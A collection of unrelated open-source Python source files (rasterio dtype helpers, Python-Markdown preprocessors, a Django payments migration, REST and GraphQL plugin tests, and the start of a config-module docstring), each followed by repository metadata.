if min_value >= -3.4028235e+38 and max_value <= 3.4028235e+38:
return float32
return float64
def is_ndarray(array):
"""Check if array is a ndarray."""
import numpy as np
return isinstance(array, np.ndarray) or hasattr(array, '__array__')
def can_cast_dtype(values, dtype):
"""Test if values can be cast to dtype without loss of information.
Parameters
----------
values: list-like
dtype: numpy dtype or string
Returns
-------
boolean
True if values can be cast to data type.
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
if values.dtype.name == np.dtype(dtype).name:
return True
elif values.dtype.kind == 'f':
return np.allclose(values, values.astype(dtype))
else:
return np.array_equal(values, values.astype(dtype))
def validate_dtype(values, valid_dtypes):
"""Test if dtype of values is one of valid_dtypes.
Parameters
----------
values: list-like
valid_dtypes: list-like
list of valid dtype strings, e.g., ('int16', 'int32')
Returns
-------
boolean:
True if dtype of values is one of valid_dtypes
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
return (values.dtype.name in valid_dtypes or
get_minimum_dtype(values) in valid_dtypes)
|
brendan-ward/rasterio
|
rasterio/dtypes.py
|
Python
|
bsd-3-clause
| 4,498
|
"""
PRE-PROCESSORS
=============================================================================
Preprocessors work on source text before we start doing anything too
complicated.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from . import util
from . import odict
import re
def build_preprocessors(md_instance, **kwargs):
""" Build the default set of preprocessors used by Markdown. """
preprocessors = odict.OrderedDict()
preprocessors['normalize_whitespace'] = NormalizeWhitespace(md_instance)
if md_instance.safeMode != 'escape':
preprocessors["html_block"] = HtmlBlockPreprocessor(md_instance)
preprocessors["reference"] = ReferencePreprocessor(md_instance)
return preprocessors
class Preprocessor(util.Processor):
"""
Preprocessors are run after the text is broken into lines.
Each preprocessor implements a "run" method that takes a pointer to a
list of lines of the document, modifies it as necessary and returns
either the same pointer or a pointer to a new list.
Preprocessors must extend markdown.Preprocessor.
"""
def run(self, lines):
"""
Each subclass of Preprocessor should override the `run` method, which
takes the document as a list of strings split by newlines and returns
the (possibly modified) list of lines.
"""
pass # pragma: no cover
class NormalizeWhitespace(Preprocessor):
""" Normalize whitespace for consistant parsing. """
def run(self, lines):
source = '\n'.join(lines)
source = source.replace(util.STX, "").replace(util.ETX, "")
source = source.replace("\r\n", "\n").replace("\r", "\n") + "\n\n"
source = source.expandtabs(self.markdown.tab_length)
source = re.sub(r'(?<=\n) +\n', '\n', source)
return source.split('\n')
class HtmlBlockPreprocessor(Preprocessor):
"""Remove html blocks from the text and store them for later retrieval."""
right_tag_patterns = ["</%s>", "%s>"]
attrs_pattern = r"""
\s+(?P<attr>[^>"'/= ]+)=(?P<q>['"])(?P<value>.*?)(?P=q) # attr="value"
| # OR
\s+(?P<attr1>[^>"'/= ]+)=(?P<value1>[^> ]+) # attr=value
| # OR
\s+(?P<attr2>[^>"'/= ]+) # attr
"""
left_tag_pattern = r'^\<(?P<tag>[^> ]+)(?P<attrs>(%s)*)\s*\/?\>?' % \
attrs_pattern
attrs_re = re.compile(attrs_pattern, re.VERBOSE)
left_tag_re = re.compile(left_tag_pattern, re.VERBOSE)
markdown_in_raw = False
def _get_left_tag(self, block):
m = self.left_tag_re.match(block)
if m:
tag = m.group('tag')
raw_attrs = m.group('attrs')
attrs = {}
if raw_attrs:
for ma in self.attrs_re.finditer(raw_attrs):
if ma.group('attr'):
if ma.group('value'):
attrs[ma.group('attr').strip()] = ma.group('value')
else:
attrs[ma.group('attr').strip()] = ""
elif ma.group('attr1'):
if ma.group('value1'):
attrs[ma.group('attr1').strip()] = ma.group('value1')
else:
attrs[ma.group('attr1').strip()] = ""
elif ma.group('attr2'):
attrs[ma.group('attr2').strip()] = ""
return tag, len(m.group(0)), attrs
else:
tag = block[1:].split(">", 1)[0].lower()
return tag, len(tag) + 2, {}
def _recursive_tagfind(self, ltag, rtag, start_index, block):
while 1:
i = block.find(rtag, start_index)
if i == -1:
return -1
j = block.find(ltag, start_index)
# if no ltag, or rtag found before another ltag, return index
if (j > i or j == -1):
return i + len(rtag)
# another ltag found before rtag, use end of ltag as starting
# point and search again
j = block.find('>', j)
start_index = self._recursive_tagfind(ltag, rtag, j + 1, block)
if start_index == -1:
# HTML potentially malformed- ltag has no corresponding
# rtag
return -1
def _get_right_tag(self, left_tag, left_index, block):
for p in self.right_tag_patterns:
tag = p % left_tag
i = self._recursive_tagfind("<%s" % left_tag, tag, left_index, block)
if i > 2:
return tag.lstrip("<").rstrip(">"), i
return block.rstrip()[-left_index:-1].lower(), len(block)
def _equal_tags(self, left_tag, right_tag):
if left_tag[0] in ['?', '@', '%']: # handle PHP, etc.
return True
if ("/" + left_tag) == right_tag:
return True
if (right_tag == "--" and left_tag == "--"):
return True
elif left_tag == right_tag[1:] and right_tag[0] == "/":
return True
else:
return False
def _is_oneliner(self, tag):
return (tag in ['hr', 'hr/'])
def _stringindex_to_listindex(self, stringindex, items):
"""
Same effect as concatenating the strings in items,
finding the character to which stringindex refers in that string,
and returning the index of the item in which that character resides.
"""
items.append('dummy')
i, count = 0, 0
while count <= stringindex:
count += len(items[i])
i += 1
return i - 1
def _nested_markdown_in_html(self, items):
"""Find and process html child elements of the given element block."""
for i, item in enumerate(items):
if self.left_tag_re.match(item):
left_tag, left_index, attrs = \
self._get_left_tag(''.join(items[i:]))
right_tag, data_index = self._get_right_tag(left_tag, left_index, ''.join(items[i:]))
right_listindex = \
self._stringindex_to_listindex(data_index, items[i:]) + i
if 'markdown' in attrs.keys():
items[i] = items[i][left_index:] # remove opening tag
placeholder = self.markdown.htmlStash.store_tag(left_tag, attrs, i + 1, right_listindex + 1)
items.insert(i, placeholder)
if len(items) - right_listindex <= 1: # last nest, no tail
right_listindex -= 1
items[right_listindex] = items[right_listindex][:-len(right_tag) - 2] # remove closing tag
else: # raw html
if len(items) - right_listindex <= 1: # last element
right_listindex -= 1
offset = 1 if i == right_listindex else 0
placeholder = self.markdown.htmlStash.store('\n\n'.join(items[i:right_listindex + offset]))
del items[i:right_listindex + offset]
items.insert(i, placeholder)
return items
def run(self, lines):
text = "\n".join(lines)
new_blocks = []
text = text.rsplit("\n\n")
items = []
left_tag = ''
right_tag = ''
in_tag = False # flag
while text:
block = text[0]
if block.startswith("\n"):
block = block[1:]
text = text[1:]
if block.startswith("\n"):
block = block[1:]
if not in_tag:
if block.startswith("<") and len(block.strip()) > 1:
if block[1:4] == "!--":
# is a comment block
left_tag, left_index, attrs = "--", 2, {}
else:
left_tag, left_index, attrs = self._get_left_tag(block)
right_tag, data_index = self._get_right_tag(left_tag,
left_index,
block)
# keep checking conditions below and maybe just append
if data_index < len(block) and (util.isBlockLevel(left_tag) or left_tag == '--'):
text.insert(0, block[data_index:])
block = block[:data_index]
if not (util.isBlockLevel(left_tag) or block[1] in ["!", "?", "@", "%"]):
new_blocks.append(block)
continue
if self._is_oneliner(left_tag):
new_blocks.append(block.strip())
continue
if block.rstrip().endswith(">") \
and self._equal_tags(left_tag, right_tag):
if self.markdown_in_raw and 'markdown' in attrs.keys():
block = block[left_index:-len(right_tag) - 2]
new_blocks.append(self.markdown.htmlStash.
store_tag(left_tag, attrs, 0, 2))
new_blocks.extend([block])
else:
new_blocks.append(self.markdown.htmlStash.store(block.strip()))
continue
else:
# if is block level tag and is not complete
if ((not self._equal_tags(left_tag, right_tag)) and (
util.isBlockLevel(left_tag) or left_tag == "--")):
items.append(block.strip())
in_tag = True
else:
new_blocks.append(self.markdown.htmlStash.store(block.strip()))
continue
else:
new_blocks.append(block)
else:
items.append(block)
right_tag, data_index = self._get_right_tag(left_tag, 0, block)
if self._equal_tags(left_tag, right_tag):
# if find closing tag
if data_index < len(block):
# we have more text after right_tag
items[-1] = block[:data_index]
text.insert(0, block[data_index:])
in_tag = False
if self.markdown_in_raw and 'markdown' in attrs.keys():
items[0] = items[0][left_index:]
items[-1] = items[-1][:-len(right_tag) - 2]
if items[len(items) - 1]: # not a newline/empty string
right_index = len(items) + 3
else:
right_index = len(items) + 2
new_blocks.append(self.markdown.htmlStash.store_tag(left_tag, attrs, 0, right_index))
placeholderslen = len(self.markdown.htmlStash.tag_data)
new_blocks.extend(self._nested_markdown_in_html(items))
nests = len(self.markdown.htmlStash.tag_data) - placeholderslen
self.markdown.htmlStash.tag_data[-1 - nests][
'right_index'] += nests - 2
else:
new_blocks.append(self.markdown.htmlStash.store('\n\n'.join(items)))
items = []
if items:
if self.markdown_in_raw and 'markdown' in attrs.keys():
items[0] = items[0][left_index:]
items[-1] = items[-1][:-len(right_tag) - 2]
if items[len(items) - 1]: # not a newline/empty string
right_index = len(items) + 3
else:
right_index = len(items) + 2
new_blocks.append(self.markdown.htmlStash.store_tag(left_tag, attrs, 0, right_index))
placeholderslen = len(self.markdown.htmlStash.tag_data)
new_blocks.extend(self._nested_markdown_in_html(items))
nests = len(self.markdown.htmlStash.tag_data) - placeholderslen
self.markdown.htmlStash.tag_data[-1 - nests][
'right_index'] += nests - 2
else:
new_blocks.append(self.markdown.htmlStash.store('\n\n'.join(items)))
new_blocks.append('\n')
new_text = "\n\n".join(new_blocks)
return new_text.split("\n")
class ReferencePreprocessor(Preprocessor):
""" Remove reference definitions from text and store for later use. """
TITLE = r'[ ]*(\"(.*)\"|\'(.*)\'|\((.*)\))[ ]*'
RE = re.compile(r'^[ ]{0,3}\[([^\]]*)\]:\s*([^ ]*)[ ]*(%s)?$' % TITLE, re.DOTALL)
TITLE_RE = re.compile(r'^%s$' % TITLE)
def run(self, lines):
new_text = []
while lines:
line = lines.pop(0)
m = self.RE.match(line)
if m:
id = m.group(1).strip().lower()
link = m.group(2).lstrip('<').rstrip('>')
t = m.group(5) or m.group(6) or m.group(7)
if not t:
# Check next line for title
tm = self.TITLE_RE.match(lines[0])
if tm:
lines.pop(0)
t = tm.group(2) or tm.group(3) or tm.group(4)
self.markdown.references[id] = (link, t)
else:
new_text.append(line)
return new_text # + "\n"
|
Situphen/Python-ZMarkdown
|
markdown/preprocessors.py
|
Python
|
bsd-3-clause
| 13,793
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-23 13:25
from __future__ import unicode_literals
import bluebottle.utils.utils
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import django_extensions.db.fields.json
import django_fsm
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('orders', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='OrderPayment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(b'created', 'Created'), (b'started', 'Started'), (b'cancelled', 'Cancelled'), (b'pledged', 'Pledged'), (b'authorized', 'Authorized'), (b'settled', 'Settled'), (b'charged_back', 'Charged_back'), (b'refunded', 'Refunded'), (b'failed', 'Failed'), (b'unknown', 'Unknown')], default=b'created', max_length=50, protected=True)),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('closed', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Closed')),
('amount', models.DecimalField(decimal_places=2, max_digits=16, verbose_name='Amount')),
('transaction_fee', models.DecimalField(decimal_places=2, help_text='Bank & transaction fee, withheld by payment provider.', max_digits=16, null=True, verbose_name='Transaction Fee')),
('payment_method', models.CharField(blank=True, default=b'', max_length=20)),
('integration_data', django_extensions.db.fields.json.JSONField(blank=True, max_length=5000, verbose_name='Integration data')),
],
bases=(models.Model, bluebottle.utils.utils.FSMTransition),
),
migrations.CreateModel(
name='OrderPaymentAction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(blank=True, choices=[(b'redirect', 'Redirect'), (b'popup', 'Popup')], max_length=20, verbose_name='Authorization action type')),
('method', models.CharField(blank=True, choices=[(b'get', 'GET'), (b'post', 'POST')], max_length=20, verbose_name='Authorization action method')),
('url', models.CharField(blank=True, max_length=2000, verbose_name='Authorization action url')),
('payload', models.CharField(blank=True, max_length=5000, verbose_name='Authorization action payload')),
],
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(b'created', 'Created'), (b'started', 'Started'), (b'cancelled', 'Cancelled'), (b'pledged', 'Pledged'), (b'authorized', 'Authorized'), (b'settled', 'Settled'), (b'charged_back', 'Charged_back'), (b'refunded', 'Refunded'), (b'failed', 'Failed'), (b'unknown', 'Unknown')], default=b'started', max_length=50)),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('order_payment', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.OrderPayment')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_payments.payment_set+', to='contenttypes.ContentType')),
],
options={
'ordering': ('-created', '-updated'),
},
),
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Payment')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_payments.transaction_set+', to='contenttypes.ContentType')),
],
options={
'ordering': ('-created', '-updated'),
},
),
migrations.AddField(
model_name='orderpayment',
name='authorization_action',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='payments.OrderPaymentAction', verbose_name='Authorization action'),
),
migrations.AddField(
model_name='orderpayment',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_payments', to='orders.Order'),
),
migrations.AddField(
model_name='orderpayment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
]
|
jfterpstra/bluebottle
|
bluebottle/payments/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 5,943
|
from __future__ import unicode_literals
import json
from decimal import Decimal
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.core.cache import caches
from dynamic_preferences.registries import (
global_preferences_registry as registry
)
from dynamic_preferences.users.registries import (
user_preferences_registry as user_registry
)
from dynamic_preferences.models import GlobalPreferenceModel
from dynamic_preferences.forms import global_preference_form_builder
from dynamic_preferences.api import serializers
from dynamic_preferences.users.serializers import UserPreferenceSerializer
from .test_app.models import BlogEntry
class BaseTest(object):
def tearDown(self):
caches['default'].clear()
class TestSerializers(BaseTest, TestCase):
def test_can_serialize_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
serializer = serializers.GlobalPreferenceSerializer(pref)
data = serializer.data
self.assertEqual(
data['default'], pref.preference.api_repr(pref.preference.default))
self.assertEqual(
data['value'], pref.preference.api_repr(pref.value))
self.assertEqual(data['identifier'], pref.preference.identifier())
self.assertEqual(data['section'], pref.section)
self.assertEqual(data['name'], pref.name)
self.assertEqual(data['verbose_name'], pref.preference.verbose_name)
self.assertEqual(data['help_text'], pref.preference.help_text)
self.assertEqual(data['field']['class'], 'IntegerField')
self.assertEqual(data['field']['input_type'], 'number')
self.assertEqual(data['field']['widget']['class'], 'NumberInput')
def test_can_change_preference_value_using_serializer(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
data = {'value': 666}
serializer = serializers.GlobalPreferenceSerializer(pref, data=data)
is_valid = serializer.is_valid()
self.assertTrue(is_valid)
serializer.save()
pref = manager.get_db_pref(section='user', name='max_users')
self.assertEqual(pref.value, data['value'])
def test_serializer_also_uses_custom_clean_method(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
# will fail because of preference cleaning
data = {'value': 1001}
serializer = serializers.GlobalPreferenceSerializer(pref, data=data)
is_valid = serializer.is_valid()
self.assertFalse(is_valid)
self.assertIn('value', serializer.errors)
def test_serializer_includes_additional_data_if_any(self):
user = User(
username="user",
email="user@user.com")
user.set_password('test')
user.save()
manager = user_registry.manager(instance=user)
pref = manager.get_db_pref(
section='user', name='favorite_vegetable')
serializer = UserPreferenceSerializer(pref)
self.assertEqual(
serializer.data['additional_data']['choices'],
pref.preference.choices)
class TestViewSets(BaseTest, TestCase):
def setUp(self):
self.admin = User(
username="admin",
email="admin@admin.com",
is_superuser=True,
is_staff=True)
self.admin.set_password('test')
self.admin.save()
def test_global_preference_list_requires_permission(self):
url = reverse('api:global-list')
# anonymous
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
# not authorized
user = User(
username="user",
email="user@user.com")
user.set_password('test')
user.save()
self.client.login(username='test', password='test')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
def test_can_list_preferences(self):
manager = registry.manager()
url = reverse('api:global-list')
self.client.login(username='admin', password="test")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(payload), len(registry.preferences()))
for e in payload:
pref = manager.get_db_pref(section=e['section'], name=e['name'])
serializer = serializers.GlobalPreferenceSerializer(pref)
self.assertEqual(pref.preference.identifier(), e['identifier'])
def test_can_detail_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(pref.preference.identifier(), payload['identifier'])
self.assertEqual(pref.value, payload['value'])
def test_can_update_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': 16}), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref = manager.get_db_pref(section='user', name='max_users')
self.assertEqual(pref.value, 16)
def test_can_update_decimal_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='type', name='cost')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': '111.11'}), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref = manager.get_db_pref(section='type', name='cost')
self.assertEqual(pref.value, Decimal('111.11'))
def test_can_update_multiple_preferences(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse('api:global-bulk')
self.client.login(username='admin', password="test")
payload = {
'user__max_users': 16,
'user__registration_allowed': True,
}
response = self.client.post(
url, json.dumps(payload), content_type='application/json')
self.assertEqual(response.status_code, 200)
pref1 = manager.get_db_pref(section='user', name='max_users')
pref2 = manager.get_db_pref(
section='user', name='registration_allowed')
self.assertEqual(pref1.value, 16)
self.assertEqual(pref2.value, True)
def test_update_preference_returns_validation_error(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
'api:global-detail',
kwargs={'pk': pref.preference.identifier()})
self.client.login(username='admin', password="test")
response = self.client.patch(
url, json.dumps({'value': 1001}), content_type='application/json')
self.assertEqual(response.status_code, 400)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(payload['value'], ['Wrong value!'])
def test_update_multiple_preferences_with_validation_errors_rollback(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse('api:global-bulk')
self.client.login(username='admin', password="test")
payload = {
'user__max_users': 1001,
'user__registration_allowed': True,
}
response = self.client.post(
url, json.dumps(payload), content_type='application/json')
self.assertEqual(response.status_code, 400)
errors = json.loads(response.content.decode('utf-8'))
self.assertEqual(
errors[pref.preference.identifier()]['value'], ['Wrong value!'])
pref1 = manager.get_db_pref(section='user', name='max_users')
pref2 = manager.get_db_pref(
section='user', name='registration_allowed')
self.assertEqual(pref1.value, pref1.preference.default)
self.assertEqual(pref2.value, pref2.preference.default)
|
haroon-sheikh/django-dynamic-preferences
|
tests/test_rest_framework.py
|
Python
|
bsd-3-clause
| 9,073
|
import graphene
import pytest
from saleor.extensions import ConfigurationTypeField
from saleor.extensions.manager import get_extensions_manager
from saleor.extensions.models import PluginConfiguration
from tests.api.utils import get_graphql_content
from tests.extensions.sample_plugins import PluginSample
from tests.extensions.utils import get_config_value
@pytest.fixture
def staff_api_client_can_manage_plugins(staff_api_client, permission_manage_plugins):
staff_api_client.user.user_permissions.add(permission_manage_plugins)
return staff_api_client
PLUGINS_QUERY = """
{
plugins(first:1){
edges{
node{
name
description
active
id
configuration{
name
type
value
helpText
label
}
}
}
}
}
"""
def test_query_plugin_configurations(staff_api_client_can_manage_plugins, settings):
# Enable test plugin
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
response = staff_api_client_can_manage_plugins.post_graphql(PLUGINS_QUERY)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
assert len(plugins) == 1
plugin = plugins[0]["node"]
plugin_configuration = PluginConfiguration.objects.get()
confiugration_structure = PluginSample.CONFIG_STRUCTURE
assert plugin["name"] == plugin_configuration.name
assert plugin["active"] == plugin_configuration.active
assert plugin["description"] == plugin_configuration.description
for index, configuration_item in enumerate(plugin["configuration"]):
assert (
configuration_item["name"]
== plugin_configuration.configuration[index]["name"]
)
if (
confiugration_structure[configuration_item["name"]]["type"]
== ConfigurationTypeField.STRING
):
assert (
configuration_item["value"]
== plugin_configuration.configuration[index]["value"]
)
elif configuration_item["value"] is None:
assert not plugin_configuration.configuration[index]["value"]
else:
assert (
configuration_item["value"]
== str(plugin_configuration.configuration[index]["value"]).lower()
)
@pytest.mark.parametrize(
"password, expected_password, api_key, expected_api_key",
[
(None, None, None, None),
("ABCDEFGHIJ", "", "123456789", "6789"),
("", None, "", None),
(None, None, "1234", "4"),
],
)
def test_query_plugins_hides_secret_fields(
password,
expected_password,
api_key,
expected_api_key,
staff_api_client,
permission_manage_plugins,
settings,
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration(PluginSample.PLUGIN_NAME)
for conf_field in plugin_configuration.configuration:
if conf_field["name"] == "Password":
conf_field["value"] = password
if conf_field["name"] == "API private key":
conf_field["value"] = api_key
plugin_configuration.save()
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGINS_QUERY)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
assert len(plugins) == 1
plugin = plugins[0]["node"]
for conf_field in plugin["configuration"]:
if conf_field["name"] == "Password":
assert conf_field["value"] == expected_password
if conf_field["name"] == "API private key":
assert conf_field["value"] == expected_api_key
PLUGIN_QUERY = """
query plugin($id: ID!){
plugin(id:$id){
name
description
active
configuration{
name
value
type
helpText
label
}
}
}
"""
@pytest.mark.parametrize(
"password, expected_password, api_key, expected_api_key",
[
(None, None, None, None),
("ABCDEFGHIJ", "", "123456789", "6789"),
("", None, "", None),
(None, None, "1234", "4"),
],
)
def test_query_plugin_hides_secret_fields(
password,
expected_password,
api_key,
expected_api_key,
staff_api_client,
permission_manage_plugins,
settings,
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration(PluginSample.PLUGIN_NAME)
for conf_field in plugin_configuration.configuration:
if conf_field["name"] == "Password":
conf_field["value"] = password
if conf_field["name"] == "API private key":
conf_field["value"] = api_key
plugin_configuration.save()
configuration_id = graphene.Node.to_global_id("Plugin", plugin_configuration.pk)
variables = {"id": configuration_id}
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGIN_QUERY, variables)
content = get_graphql_content(response)
plugin = content["data"]["plugin"]
for conf_field in plugin["configuration"]:
if conf_field["name"] == "Password":
assert conf_field["value"] == expected_password
if conf_field["name"] == "API private key":
assert conf_field["value"] == expected_api_key
def test_query_plugin_configuration(
staff_api_client, permission_manage_plugins, settings
):
settings.PLUGINS = ["tests.api.test_extensions.PluginSample"]
manager = get_extensions_manager()
plugin_configuration = manager.get_plugin_configuration("PluginSample")
configuration_id = graphene.Node.to_global_id("Plugin", plugin_configuration.pk)
variables = {"id": configuration_id}
staff_api_client.user.user_permissions.add(permission_manage_plugins)
response = staff_api_client.post_graphql(PLUGIN_QUERY, variables)
content = get_graphql_content(response)
plugin = content["data"]["plugin"]
assert plugin["name"] == plugin_configuration.name
assert plugin["active"] == plugin_configuration.active
assert plugin["description"] == plugin_configuration.description
configuration_item = plugin["configuration"][0]
assert configuration_item["name"] == plugin_configuration.configuration[0]["name"]
assert configuration_item["value"] == plugin_configuration.configuration[0]["value"]
PLUGIN_UPDATE_MUTATION = """
mutation pluginUpdate(
$id: ID!, $active: Boolean, $configuration: [ConfigurationItemInput]){
pluginUpdate(
id:$id,
input:{active: $active, configuration: $configuration}
){
plugin{
name
active
configuration{
name
value
type
helpText
label
}
}
errors{
field
message
}
}
}
"""
@pytest.mark.parametrize(
"active, updated_configuration_item",
[
(True, {"name": "Username", "value": "user"}),
(False, {"name": "Username", "value": "admin@example.com"}),
],
)
def test_plugin_configuration_update(
staff_api_client_can_manage_plugins, settings, active, updated_configuration_item
):
settings.PLUGINS = ["tests.extensions.sample_plugins.PluginSample"]
manager = get_extensions_manager()
plugin = manager.get_plugin_configuration(plugin_name="PluginSample")
old_configuration = plugin.configuration
plugin_id = graphene.Node.to_global_id("Plugin", plugin.pk)
variables = {
"id": plugin_id,
"active": active,
"configuration": [updated_configuration_item],
}
response = staff_api_client_can_manage_plugins.post_graphql(
PLUGIN_UPDATE_MUTATION, variables
)
get_graphql_content(response)
plugin = PluginConfiguration.objects.get(name="PluginSample")
assert plugin.active == active
first_configuration_item = plugin.configuration[0]
assert first_configuration_item["name"] == updated_configuration_item["name"]
assert first_configuration_item["value"] == updated_configuration_item["value"]
assert set(first_configuration_item.keys()) == {"name", "value"}
second_configuration_item = plugin.configuration[1]
assert second_configuration_item["name"] == old_configuration[1]["name"]
assert second_configuration_item["value"] == old_configuration[1]["value"]
assert set(second_configuration_item.keys()) == {"name", "value"}
def test_plugin_update_saves_boolean_as_boolean(
staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = ["tests.extensions.sample_plugins.PluginSample"]
manager = get_extensions_manager()
plugin = manager.get_plugin_configuration(plugin_name="PluginSample")
use_sandbox = get_config_value("Use sandbox", plugin.configuration)
plugin_id = graphene.Node.to_global_id("Plugin", plugin.pk)
variables = {
"id": plugin_id,
"active": plugin.active,
"configuration": [{"name": "Use sandbox", "value": True}],
}
response = staff_api_client_can_manage_plugins.post_graphql(
PLUGIN_UPDATE_MUTATION, variables
)
content = get_graphql_content(response)
assert len(content["data"]["pluginUpdate"]["errors"]) == 0
plugin.refresh_from_db()
use_sandbox_new_value = get_config_value("Use sandbox", plugin.configuration)
assert type(use_sandbox) == type(use_sandbox_new_value)
@pytest.mark.parametrize(
"plugin_filter, count",
[
({"search": "PluginSample"}, 1),
({"search": "description"}, 2),
({"active": True}, 2),
({"search": "Plugin"}, 2),
({"active": "False", "search": "Plugin"}, 1),
],
)
def test_plugins_query_with_filter(
plugin_filter, count, staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = [
"tests.extensions.sample_plugins.PluginSample",
"tests.extensions.sample_plugins.PluginInactive",
"tests.extensions.sample_plugins.ActivePlugin",
]
query = """
query ($filter: PluginFilterInput) {
plugins(first: 5, filter:$filter) {
totalCount
edges {
node {
id
}
}
}
}
"""
variables = {"filter": plugin_filter}
response = staff_api_client_can_manage_plugins.post_graphql(query, variables)
content = get_graphql_content(response)
assert content["data"]["plugins"]["totalCount"] == count
QUERY_PLUGIN_WITH_SORT = """
query ($sort_by: PluginSortingInput!) {
plugins(first:5, sortBy: $sort_by) {
edges{
node{
name
}
}
}
}
"""
@pytest.mark.parametrize(
"plugin_sort, result_order",
[
(
{"field": "NAME", "direction": "ASC"},
["Active", "PluginInactive", "PluginSample"],
),
(
{"field": "NAME", "direction": "DESC"},
["PluginSample", "PluginInactive", "Active"],
),
(
{"field": "IS_ACTIVE", "direction": "ASC"},
["PluginInactive", "Active", "PluginSample"],
),
(
{"field": "IS_ACTIVE", "direction": "DESC"},
["Active", "PluginSample", "PluginInactive"],
),
],
)
def test_query_plugins_with_sort(
plugin_sort, result_order, staff_api_client_can_manage_plugins, settings
):
settings.PLUGINS = [
"tests.extensions.sample_plugins.PluginSample",
"tests.extensions.sample_plugins.PluginInactive",
"tests.extensions.sample_plugins.ActivePlugin",
]
variables = {"sort_by": plugin_sort}
response = staff_api_client_can_manage_plugins.post_graphql(
QUERY_PLUGIN_WITH_SORT, variables
)
content = get_graphql_content(response)
plugins = content["data"]["plugins"]["edges"]
for order, plugin_name in enumerate(result_order):
assert plugins[order]["node"]["name"] == plugin_name
|
maferelo/saleor
|
tests/api/test_extensions.py
|
Python
|
bsd-3-clause
| 12,488
|
"""Tools for easy persistance of configuration and user preferences for tools.
Configurations are split into sections and keys; sections are conceptually for
each tool (or other grouping of settings), and keys are for individual settings
within that tool/section. In the current implementation, individual sections
are saved within YAML files as a mapping.
Basic usage::
# Creating the config object; give it a unique name. Slashes will be
# used directly to specify sub-directories.
config = metatools.config.Config('your_company/' + __name__)
# Use a value within the config; treat it like a dict.
dialog = setup_gui(width=config.get('width', 800))
# Save the values later.
config['width'] = dialog.width()
